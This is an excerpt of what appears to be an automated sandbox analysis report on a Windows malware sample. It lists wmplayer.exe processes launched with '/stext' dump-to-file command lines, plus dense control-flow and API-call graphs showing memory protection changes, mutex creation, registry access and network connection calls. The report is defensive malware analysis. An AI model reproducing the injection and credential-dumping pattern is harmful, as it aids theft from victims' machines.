                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true


                                                                                            Execution Graph

                                                                                            Execution Coverage:15.7%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:6
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph 8216 7ff848b60c61 8217 7ff848b60c6f FreeConsole 8216->8217 8219 7ff848b60d2e 8217->8219 8220 7ff848b61a22 8221 7ff848b61a31 VirtualProtect 8220->8221 8223 7ff848b61b12 8221->8223

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: fish
                                                                                            • API String ID: 0-1064584243
                                                                                            • Opcode ID: e7f8aaaef9f76bac35ada08cad135e719d18124abe0ab56047ae2c0c5cab8b0b
                                                                                            • Instruction ID: 421f41c332bd917fc72efaa8723a2cbb0207760c365d96d7a770e18a9812b641
                                                                                            • Opcode Fuzzy Hash: e7f8aaaef9f76bac35ada08cad135e719d18124abe0ab56047ae2c0c5cab8b0b
                                                                                            • Instruction Fuzzy Hash: 5AD14931A1CA8A0FE75DBB3898551B577E1FF96350F0441BED48BC36D3DE28A8068786

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 803 7ff848b6a891-7ff848b6a8cb 805 7ff848b6a95c-7ff848b6a96f 803->805 806 7ff848b6a8d1-7ff848b6a916 call 7ff848b69970 call 7ff848b65870 803->806 811 7ff848b6a9b1-7ff848b6a9b4 805->811 812 7ff848b6a971-7ff848b6a989 805->812 806->805 819 7ff848b6a918-7ff848b6a936 806->819 814 7ff848b6aa56-7ff848b6aa67 811->814 815 7ff848b6a9b5-7ff848b6a9d1 811->815 817 7ff848b6a98b-7ff848b6a9af 812->817 818 7ff848b6a9d3-7ff848b6a9ea call 7ff848b65870 call 7ff848b65fd0 812->818 824 7ff848b6aaa9-7ff848b6aab6 814->824 825 7ff848b6aa69-7ff848b6aa77 814->825 815->818 817->811 818->814 835 7ff848b6a9ec-7ff848b6a9fe 818->835 819->805 822 7ff848b6a938-7ff848b6a95b 819->822 828 7ff848b6aab7-7ff848b6aac1 824->828 829 7ff848b6ab53-7ff848b6ab61 824->829 827 7ff848b6aa7a 825->827 831 7ff848b6aa7b-7ff848b6aa89 827->831 832 7ff848b6aac7-7ff848b6aad1 828->832 833 7ff848b6aac3-7ff848b6aac4 828->833 841 7ff848b6ab66-7ff848b6ab84 829->841 842 7ff848b6ab63-7ff848b6ab65 829->842 834 7ff848b6aad3-7ff848b6aaf5 call 7ff848b69970 831->834 840 7ff848b6aa8b-7ff848b6aa8e 831->840 832->834 833->832 834->829 848 7ff848b6aaf7-7ff848b6ab09 834->848 835->827 845 7ff848b6aa00 835->845 846 7ff848b6aa92-7ff848b6aaa8 840->846 847 7ff848b6ab85-7ff848b6ab89 841->847 842->841 849 7ff848b6aa46-7ff848b6aa55 845->849 850 7ff848b6aa02-7ff848b6aa0a 845->850 846->824 851 7ff848b6ab8b-7ff848b6abb6 847->851 852 7ff848b6abd3-7ff848b6ac13 call 7ff848b69970 * 2 call 7ff848b65870 847->852 848->847 858 7ff848b6ab0b 848->858 850->831 854 7ff848b6aa0c-7ff848b6aa11 850->854 855 7ff848b6acac-7ff848b6acbf 851->855 856 7ff848b6abbc-7ff848b6abd0 851->856 852->855 882 7ff848b6ac19-7ff848b6ac4c 852->882 854->846 859 7ff848b6aa13-7ff848b6aa34 call 7ff848b65c10 854->859 871 7ff848b6ad01 855->871 872 7ff848b6acc1-7ff848b6acd6 855->872 856->852 861 7ff848b6ab0d-7ff848b6ab2b call 7ff848b65c10 858->861 862 7ff848b6ab51-7ff848b6ab52 858->862 
859->814 868 7ff848b6aa36-7ff848b6aa44 859->868 861->829 875 7ff848b6ab2d-7ff848b6ab50 861->875 868->849 873 7ff848b6ad02-7ff848b6ad09 871->873 877 7ff848b6ad0b-7ff848b6ad0e 872->877 879 7ff848b6acd8 872->879 873->877 875->862 880 7ff848b6ad22-7ff848b6ad2e 877->880 881 7ff848b6ad10-7ff848b6ad20 877->881 883 7ff848b6acdb-7ff848b6acee 879->883 884 7ff848b6ad3e-7ff848b6ad47 880->884 885 7ff848b6ad30-7ff848b6ad3b 880->885 881->884 890 7ff848b6ac4e-7ff848b6ac6a 882->890 891 7ff848b6ac95-7ff848b6ac9e 882->891 883->873 887 7ff848b6acf0-7ff848b6acf1 883->887 888 7ff848b6adb8-7ff848b6adc5 884->888 889 7ff848b6ad49-7ff848b6ad4b 884->889 885->884 892 7ff848b6acf2-7ff848b6ad00 887->892 895 7ff848b6adc7-7ff848b6adda 888->895 894 7ff848b6ad4d 889->894 889->895 890->883 901 7ff848b6ac6c-7ff848b6ac71 890->901 893 7ff848b6aca0-7ff848b6acab 891->893 892->884 897 7ff848b6ad4f-7ff848b6ad67 call 7ff848b65c10 894->897 898 7ff848b6ad93-7ff848b6adb7 894->898 899 7ff848b6ade1-7ff848b6ae13 call 7ff848b69970 call 7ff848b65870 895->899 900 7ff848b6addc call 7ff848b69970 895->900 897->898 903 7ff848b6adbd-7ff848b6addc call 7ff848b69970 898->903 904 7ff848b6af19-7ff848b6af4a 898->904 899->904 918 7ff848b6ae19-7ff848b6ae39 899->918 900->899 901->892 902 7ff848b6ac73-7ff848b6ac93 901->902 902->893 903->899 919 7ff848b6af4c-7ff848b6af77 904->919 920 7ff848b6af94-7ff848b6afd6 call 7ff848b69970 * 2 call 7ff848b65870 904->920 925 7ff848b6aeba-7ff848b6aecb 918->925 926 7ff848b6ae3b-7ff848b6ae5b 918->926 922 7ff848b6b10e-7ff848b6b163 919->922 923 7ff848b6af7d-7ff848b6af93 919->923 920->922 947 7ff848b6afdc-7ff848b6affa 920->947 941 7ff848b6b169-7ff848b6b1be call 7ff848b69970 * 2 call 7ff848b65870 922->941 942 7ff848b6b236-7ff848b6b241 922->942 923->920 928 7ff848b6aecc-7ff848b6aed8 925->928 926->928 929 7ff848b6ae5d-7ff848b6ae62 926->929 934 7ff848b6aedf-7ff848b6aee0 928->934 935 7ff848b6aeda call 7ff848b6a340 928->935 930 7ff848b6ae64-7ff848b6ae96 call 7ff848b65c10 929->930 931 
7ff848b6aee3-7ff848b6aeef 929->931 930->904 945 7ff848b6ae9c-7ff848b6aeda call 7ff848b6a340 930->945 931->904 937 7ff848b6aef1-7ff848b6af18 931->937 934->931 935->934 941->942 973 7ff848b6b1c0-7ff848b6b1eb 941->973 952 7ff848b6b246-7ff848b6b28b 942->952 953 7ff848b6b243-7ff848b6b245 942->953 945->934 947->922 951 7ff848b6b000-7ff848b6b01a 947->951 955 7ff848b6b01c-7ff848b6b01f 951->955 956 7ff848b6b073 951->956 961 7ff848b6b315-7ff848b6b327 952->961 962 7ff848b6b291-7ff848b6b2d1 call 7ff848b69970 call 7ff848b65870 952->962 953->952 959 7ff848b6b0a0-7ff848b6b0e2 call 7ff848b6a340 955->959 960 7ff848b6b021-7ff848b6b03a 955->960 963 7ff848b6b0e4 956->963 964 7ff848b6b075-7ff848b6b07a 956->964 959->963 967 7ff848b6b03c-7ff848b6b053 960->967 968 7ff848b6b055-7ff848b6b067 960->968 982 7ff848b6b369 961->982 983 7ff848b6b329-7ff848b6b367 961->983 962->961 991 7ff848b6b2d3-7ff848b6b2ec call 7ff848b673d0 962->991 963->922 966 7ff848b6b0e6-7ff848b6b0f9 963->966 970 7ff848b6b07c-7ff848b6b09b call 7ff848b65c10 964->970 971 7ff848b6b0fb-7ff848b6b10d 964->971 966->971 975 7ff848b6b06b-7ff848b6b071 967->975 968->975 970->959 980 7ff848b6b1ed-7ff848b6b1ff 973->980 981 7ff848b6b22a-7ff848b6b235 973->981 975->956 980->942 987 7ff848b6b201-7ff848b6b227 980->987 983->982 987->981 993 7ff848b6b2f1-7ff848b6b301 991->993 994 7ff848b6b303-7ff848b6b314 993->994
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 631862d55042f569f72cc0bab5c16e1156c20418bac6260a2a93b392dcd1839b
                                                                                            • Instruction ID: b26bd5ce8702a13f43c5df9191c58c6ff3ea618df6c68611a471a3496a6e8022
                                                                                            • Opcode Fuzzy Hash: 631862d55042f569f72cc0bab5c16e1156c20418bac6260a2a93b392dcd1839b
                                                                                            • Instruction Fuzzy Hash: 8082553051CB868FE719EB28C4804A1B7E1FF95341F1445BED48AC76A6EF35E896C782
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56131a95839e0b345a0d8a0511a9e2b7cf52a40935272c2836a7dbb44af3349d
                                                                                            • Instruction ID: 1323b975a1d368688546ee1fdf3f8535f64ee4e37b96c918002103a6402cf428
                                                                                            • Opcode Fuzzy Hash: 56131a95839e0b345a0d8a0511a9e2b7cf52a40935272c2836a7dbb44af3349d
                                                                                            • Instruction Fuzzy Hash: FE727531D0C7868FE7699B2488416B57BE1EF91350F1441BDD88E8BED3DF28A846C788

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8468d8db404c67fc49b9e208948ecdafbe8cd86d1ea94316ebc07e76322121e6
                                                                                            • Instruction ID: 9faff8704264f147f09a629ceb4923eb109d6b7859897ecee85fe155f80f9644
                                                                                            • Opcode Fuzzy Hash: 8468d8db404c67fc49b9e208948ecdafbe8cd86d1ea94316ebc07e76322121e6
                                                                                            • Instruction Fuzzy Hash: 49320830A0CA0A8FDB69EB2C9465A7977E1FF55340F1401BEE48ED7592DF24EC428746

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246368539.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848c40000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A
                                                                                            • API String ID: 0-3554254475
                                                                                            • Opcode ID: d7d3016025e772a19a7bebe7091bc435faf142ee96ffa3138391ef9fed10ac84
                                                                                            • Instruction ID: af7b2313642101e431981433cfd331d428660c101504f0902514f06761a94c2b
                                                                                            • Opcode Fuzzy Hash: d7d3016025e772a19a7bebe7091bc435faf142ee96ffa3138391ef9fed10ac84
                                                                                            • Instruction Fuzzy Hash: 0132263180CA8A8FE7D5FB28C8556B97BE0FF95740F1406BDD04ACB197DB24A886C785

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 628 7ff848b61a22-7ff848b61a2f 629 7ff848b61a3a-7ff848b61a4b 628->629 630 7ff848b61a31-7ff848b61a39 628->630 631 7ff848b61a4d-7ff848b61a55 629->631 632 7ff848b61a56-7ff848b61b10 VirtualProtect 629->632 630->629 631->632 635 7ff848b61b18-7ff848b61b40 632->635 636 7ff848b61b12 632->636 636->635
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: a1f439759b71cb07cb35d8245c1c12222692f64000ef5926443de030f02d4d93
                                                                                            • Instruction ID: ab8ed267573dbf2f3d3f3d0a5985c23f5de9c31b4df78143123c8a966189a291
                                                                                            • Opcode Fuzzy Hash: a1f439759b71cb07cb35d8245c1c12222692f64000ef5926443de030f02d4d93
                                                                                            • Instruction Fuzzy Hash: 9441493090CB888FDB19DBA898466F9BBF1EF56321F14426FD049D3692CF746442CB95

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 637 7ff848b60c61-7ff848b60c6d 638 7ff848b60c6f 637->638 639 7ff848b60c70-7ff848b60c81 637->639 638->639 640 7ff848b60c84-7ff848b60c95 639->640 641 7ff848b60c83 639->641 642 7ff848b60c98-7ff848b60d2c FreeConsole 640->642 643 7ff848b60c97 640->643 641->640 647 7ff848b60d2e 642->647 648 7ff848b60d34-7ff848b60d5b 642->648 643->642 647->648
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleFree
                                                                                            • String ID:
                                                                                            • API String ID: 771614528-0
                                                                                            • Opcode ID: ffd1776560fe93f5bacb7aaa1a9626fcb6aa05a6a0a40d7ab80776daa8a7aaf6
                                                                                            • Instruction ID: 6f0bd6112b8fa731e15735dc4ab5c5e679451e73ac11e39d154dce1916849d43
                                                                                            • Opcode Fuzzy Hash: ffd1776560fe93f5bacb7aaa1a9626fcb6aa05a6a0a40d7ab80776daa8a7aaf6
                                                                                            • Instruction Fuzzy Hash: 6431147040DB889FDB16EB688844AFA7FF4EF53321F0441AFD089D3592D724644ACB52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246368539.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848c40000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4070bf891ccafa66a779842e619fd4f14c62e8a39586b2d86f9fc8285aad4d1
                                                                                            • Instruction ID: 25434633607d75c5a744b7f814538961464e581eb1b4bc54ecb6056fe6773e60
                                                                                            • Opcode Fuzzy Hash: b4070bf891ccafa66a779842e619fd4f14c62e8a39586b2d86f9fc8285aad4d1
                                                                                            • Instruction Fuzzy Hash: 73916A32D0CAD98FE796EB28985A1B47BE0FF55750F0805FBC4C9C7196EB14A886C385

                                                                                            Execution Graph

                                                                                            Execution Coverage:4.8%
                                                                                            Dynamic/Decrypted Code Coverage:4.2%
                                                                                            Signature Coverage:6.9%
                                                                                            Total number of Nodes:1654
                                                                                            Total number of Limit Nodes:51
52869 40bee1 CreateMutexA GetLastError 52869->52566 53242 41b15b 52870->53242 52872 41a471 53246 412513 RegOpenKeyExA 52872->53246 52875 401eef 26 API calls 52876 41a49f 52875->52876 52877 401eea 26 API calls 52876->52877 52878 41a4a7 52877->52878 52879 41a4fa 52878->52879 52880 412513 31 API calls 52878->52880 52879->52572 52881 41a4cd 52880->52881 52882 41a4d8 StrToIntA 52881->52882 52883 41a4ef 52882->52883 52884 41a4e6 52882->52884 52886 401eea 26 API calls 52883->52886 53251 41c102 28 API calls 52884->53251 52886->52879 52888 40698f 52887->52888 52889 4124b7 3 API calls 52888->52889 52890 406996 52889->52890 52890->52582 52890->52583 52892 41ae1c 52891->52892 53252 40b027 52892->53252 52894 41ae24 52894->52597 52896 401e27 52895->52896 52898 401e33 52896->52898 53261 402121 26 API calls 52896->53261 52898->52601 52901 402121 52899->52901 52900 402150 52900->52603 52901->52900 53262 402718 26 API calls _Deallocate 52901->53262 52904 4128c0 52903->52904 52905 406052 28 API calls 52904->52905 52906 4128d5 52905->52906 52907 401fbd 28 API calls 52906->52907 52908 4128e5 52907->52908 52909 4126d2 29 API calls 52908->52909 52910 4128ef 52909->52910 52911 401eea 26 API calls 52910->52911 52912 4128fc 52911->52912 52912->52648 52914 401f6e 52913->52914 53263 402301 52914->53263 52918 412722 52917->52918 52919 4126eb 52917->52919 52920 401eea 26 API calls 52918->52920 52922 4126fd RegSetValueExA RegCloseKey 52919->52922 52921 40dd3b 52920->52921 52921->52650 52922->52918 52924 43a600 _strftime 52923->52924 53267 43993e 52924->53267 52928 41a737 52927->52928 52929 41a69c GetLocalTime 52927->52929 52931 401eea 26 API calls 52928->52931 52930 404cbf 28 API calls 52929->52930 52932 41a6de 52930->52932 52933 41a73f 52931->52933 52934 405ce6 28 API calls 52932->52934 52935 401eea 26 API calls 52933->52935 52936 41a6ea 52934->52936 52937 40ddaa 52935->52937 53301 4027cb 52936->53301 52937->52674 52939 41a6f6 52940 405ce6 28 API calls 52939->52940 52941 41a702 52940->52941 
53304 406478 76 API calls 52941->53304 52943 41a710 52944 401eea 26 API calls 52943->52944 52945 41a71c 52944->52945 52946 401eea 26 API calls 52945->52946 52947 41a725 52946->52947 52948 401eea 26 API calls 52947->52948 52949 41a72e 52948->52949 52950 401eea 26 API calls 52949->52950 52950->52928 52952 409536 _wcslen 52951->52952 52953 409541 52952->52953 52954 409558 52952->52954 52955 40c89e 32 API calls 52953->52955 52956 40c89e 32 API calls 52954->52956 52957 409549 52955->52957 52958 409560 52956->52958 52959 401e18 26 API calls 52957->52959 52960 401e18 26 API calls 52958->52960 52975 409553 52959->52975 52961 40956e 52960->52961 52962 401e13 26 API calls 52961->52962 52964 409576 52962->52964 52963 401e13 26 API calls 52965 4095ad 52963->52965 53324 40856b 28 API calls 52964->53324 53309 409837 52965->53309 52967 409588 53325 4028cf 52967->53325 52971 409593 52972 401e18 26 API calls 52971->52972 52973 40959d 52972->52973 52974 401e13 26 API calls 52973->52974 52974->52975 52975->52963 53516 403b40 52976->53516 52980 41a7fd 52981 4028cf 28 API calls 52980->52981 52982 41a807 52981->52982 52983 401e13 26 API calls 52982->52983 52984 41a810 52983->52984 52985 401e13 26 API calls 52984->52985 52986 40dfc3 52985->52986 52986->52727 52988 40e08b 52987->52988 52989 41248f RegQueryValueExA RegCloseKey 52987->52989 52988->52755 52988->52757 52989->52988 52991 4125b0 RegQueryValueExW RegCloseKey 52990->52991 52992 4125dd 52990->52992 52991->52992 52993 403b40 28 API calls 52992->52993 52994 40e0ba 52993->52994 52994->52768 52996 412992 RegDeleteValueW 52995->52996 52997 4129a6 52995->52997 52996->52997 52998 4129a2 52996->52998 52997->52777 52998->52777 53000 40cbc5 52999->53000 53001 41246e 3 API calls 53000->53001 53002 40cbcc 53001->53002 53006 40cbeb 53002->53006 53538 401602 53002->53538 53004 40cbd9 53541 4127d5 RegCreateKeyA 53004->53541 53007 413fd4 53006->53007 53008 413feb 53007->53008 53558 41aa73 53008->53558 53010 413ff6 53011 401d64 28 API calls 
53010->53011 53012 41400f 53011->53012 53013 43a5e7 _strftime 42 API calls 53012->53013 53014 41401c 53013->53014 53015 414021 Sleep 53014->53015 53016 41402e 53014->53016 53015->53016 53017 401f66 28 API calls 53016->53017 53018 41403d 53017->53018 53019 401d64 28 API calls 53018->53019 53020 41404b 53019->53020 53021 401fbd 28 API calls 53020->53021 53022 414053 53021->53022 53023 41afc3 28 API calls 53022->53023 53024 41405b 53023->53024 53562 404262 WSAStartup 53024->53562 53026 414065 53027 401d64 28 API calls 53026->53027 53028 41406e 53027->53028 53029 401d64 28 API calls 53028->53029 53091 4140ed 53028->53091 53030 414087 53029->53030 53031 401d64 28 API calls 53030->53031 53032 414098 53031->53032 53034 401d64 28 API calls 53032->53034 53033 41afc3 28 API calls 53033->53091 53036 4140a9 53034->53036 53035 401d64 28 API calls 53035->53091 53037 401d64 28 API calls 53036->53037 53039 4140ba 53037->53039 53038 4085b4 28 API calls 53038->53091 53041 401d64 28 API calls 53039->53041 53040 401eef 26 API calls 53040->53091 53042 4140cb 53041->53042 53043 401d64 28 API calls 53042->53043 53044 4140dd 53043->53044 53694 404101 87 API calls 53044->53694 53046 401f66 28 API calls 53046->53091 53047 41a686 79 API calls 53047->53091 53049 414244 WSAGetLastError 53695 41bc76 30 API calls 53049->53695 53056 404cbf 28 API calls 53056->53091 53057 401d64 28 API calls 53059 414b68 53057->53059 53058 401d8c 26 API calls 53058->53091 53059->53057 53060 43a5e7 _strftime 42 API calls 53059->53060 53061 414b80 Sleep 53060->53061 53061->53091 53062 405ce6 28 API calls 53062->53091 53065 4082dc 28 API calls 53065->53091 53066 440c51 26 API calls 53066->53091 53067 401fbd 28 API calls 53067->53091 53068 41265d 3 API calls 53068->53091 53069 412513 31 API calls 53069->53091 53070 403b40 28 API calls 53070->53091 53073 401d64 28 API calls 53074 4144ed GetTickCount 53073->53074 53075 41ad46 28 API calls 53074->53075 53075->53091 53077 41ad46 28 API calls 53077->53091 53079 41aec8 28 
API calls 53079->53091 53082 4027cb 28 API calls 53082->53091 53083 40275c 28 API calls 53083->53091 53084 404468 60 API calls 53084->53091 53085 401eea 26 API calls 53085->53091 53086 401e13 26 API calls 53086->53091 53088 414ae4 53697 40a767 84 API calls 53088->53697 53090 414b22 CreateThread 53090->53091 54176 419e89 104 API calls 53090->54176 53091->53033 53091->53035 53091->53038 53091->53040 53091->53046 53091->53047 53091->53049 53091->53056 53091->53058 53091->53059 53091->53062 53091->53065 53091->53066 53091->53067 53091->53068 53091->53069 53091->53070 53091->53073 53091->53077 53091->53079 53091->53082 53091->53083 53091->53084 53091->53085 53091->53086 53091->53088 53091->53090 53563 413f9a 53091->53563 53569 4041f1 53091->53569 53576 404915 53091->53576 53591 40428c connect 53091->53591 53651 41a96d 53091->53651 53654 413683 53091->53654 53657 40cbf1 53091->53657 53663 41adee 53091->53663 53666 41aca0 GetLastInputInfo GetTickCount 53091->53666 53667 41ac52 53091->53667 53672 40e679 GetLocaleInfoA 53091->53672 53675 4027ec 53091->53675 53679 4045d5 53091->53679 53696 404c9e 28 API calls 53091->53696 53698 4047eb WaitForSingleObject 53091->53698 53092->52527 53093->52537 53096 4085c0 53095->53096 53097 402e78 28 API calls 53096->53097 53098 4085e4 53097->53098 53098->52558 53100 4124e1 RegQueryValueExA RegCloseKey 53099->53100 53101 41250b 53099->53101 53100->53101 53101->52554 53102->52561 53103->52590 53104->52583 53105->52575 53106->52588 53108 40c8ba 53107->53108 53109 40c8da 53108->53109 53110 40c90f 53108->53110 53117 40c8d0 53108->53117 54188 41a74b 29 API calls 53109->54188 53113 41b15b 2 API calls 53110->53113 53112 40ca03 GetLongPathNameW 53115 403b40 28 API calls 53112->53115 53116 40c914 53113->53116 53114 40c8e3 53118 401e18 26 API calls 53114->53118 53119 40ca18 53115->53119 53120 40c918 53116->53120 53121 40c96a 53116->53121 53117->53112 53123 40c8ed 53118->53123 53124 403b40 28 API calls 53119->53124 53122 403b40 28 API calls 
53120->53122 53125 403b40 28 API calls 53121->53125 53127 40c926 53122->53127 53129 401e13 26 API calls 53123->53129 53128 40ca27 53124->53128 53126 40c978 53125->53126 53133 403b40 28 API calls 53126->53133 53134 403b40 28 API calls 53127->53134 54177 40cc37 53128->54177 53129->53117 53136 40c98e 53133->53136 53137 40c93c 53134->53137 53135 40ca45 53138 402860 28 API calls 53135->53138 53139 402860 28 API calls 53136->53139 53140 402860 28 API calls 53137->53140 53141 40ca4f 53138->53141 53142 40c999 53139->53142 53143 40c947 53140->53143 53144 401e13 26 API calls 53141->53144 53145 401e18 26 API calls 53142->53145 53146 401e18 26 API calls 53143->53146 53147 40ca59 53144->53147 53148 40c9a4 53145->53148 53149 40c952 53146->53149 53150 401e13 26 API calls 53147->53150 53151 401e13 26 API calls 53148->53151 53152 401e13 26 API calls 53149->53152 53153 40ca62 53150->53153 53154 40c9ad 53151->53154 53155 40c95b 53152->53155 53156 401e13 26 API calls 53153->53156 53157 401e13 26 API calls 53154->53157 53158 401e13 26 API calls 53155->53158 53159 40ca6b 53156->53159 53157->53123 53158->53123 53160 401e13 26 API calls 53159->53160 53161 40ca74 53160->53161 53162 401e13 26 API calls 53161->53162 53163 40ca7d 53162->53163 53163->52636 53164->52649 53165->52670 53167 412683 RegQueryValueExA RegCloseKey 53166->53167 53168 4126a7 53166->53168 53167->53168 53168->52629 53169->52664 53170->52699 53171->52709 53173 401f66 28 API calls 53172->53173 53174 40c86b 53173->53174 53175 41ae08 28 API calls 53174->53175 53176 40c876 53175->53176 53177 40c89e 32 API calls 53176->53177 53178 40c887 53177->53178 53179 401e13 26 API calls 53178->53179 53180 40c890 53179->53180 53181 401eea 26 API calls 53180->53181 53182 40c898 53181->53182 53182->52733 53183->52720 53184->52754 53186 401e0c 53185->53186 53187->52581 53190 40e183 53189->53190 53191 41a65c LoadResource LockResource SizeofResource 53189->53191 53190->52810 53191->53190 53193 401f86 28 API calls 53192->53193 53194 406066 
53193->53194 53194->52821 53200 403c30 53195->53200 53198->52842 53199->52823 53201 403c39 53200->53201 53204 403c59 53201->53204 53205 403c68 53204->53205 53210 4032a4 53205->53210 53207 403c74 53208 402325 28 API calls 53207->53208 53209 403b73 53208->53209 53209->52842 53211 4032b0 53210->53211 53212 4032ad 53210->53212 53215 4032b6 28 API calls 53211->53215 53212->53207 53216->52846 53219 402e85 53218->53219 53220 402ea9 53219->53220 53221 402e98 53219->53221 53223 402eae 53219->53223 53220->52855 53225 403445 28 API calls 53221->53225 53223->53220 53226 40225b 26 API calls 53223->53226 53225->53220 53226->53220 53228 404bd0 53227->53228 53231 40245c 53228->53231 53230 404be4 53230->52858 53232 402469 53231->53232 53234 402478 53232->53234 53235 402ad3 28 API calls 53232->53235 53234->53230 53235->53234 53238 4021c6 53236->53238 53237 4021e8 53237->52861 53238->53237 53239 40262e 26 API calls 53238->53239 53239->53237 53241 401e94 53240->53241 53243 41b183 53242->53243 53244 41b168 GetCurrentProcess IsWow64Process 53242->53244 53243->52872 53244->53243 53245 41b17f 53244->53245 53245->52872 53247 412541 RegQueryValueExA RegCloseKey 53246->53247 53248 412569 53246->53248 53247->53248 53249 401f66 28 API calls 53248->53249 53250 41257e 53249->53250 53250->52875 53251->52883 53253 40b02f 53252->53253 53256 40b04b 53253->53256 53255 40b045 53255->52894 53257 40b055 53256->53257 53259 40b060 53257->53259 53260 40b138 28 API calls 53257->53260 53259->53255 53260->53259 53261->52898 53262->52900 53264 40230d 53263->53264 53265 402325 28 API calls 53264->53265 53266 401f80 53265->53266 53266->52642 53285 43a545 53267->53285 53269 40dd54 53269->52657 53269->52659 53270 43998b 53294 4392de 38 API calls 3 library calls 53270->53294 53271 439950 53271->53269 53271->53270 53272 439965 53271->53272 53292 445354 20 API calls _Atexit 53272->53292 53275 43996a 53293 43a827 26 API calls _Deallocate 53275->53293 53278 439997 53279 4399c6 53278->53279 53295 43a58a 42 API calls 
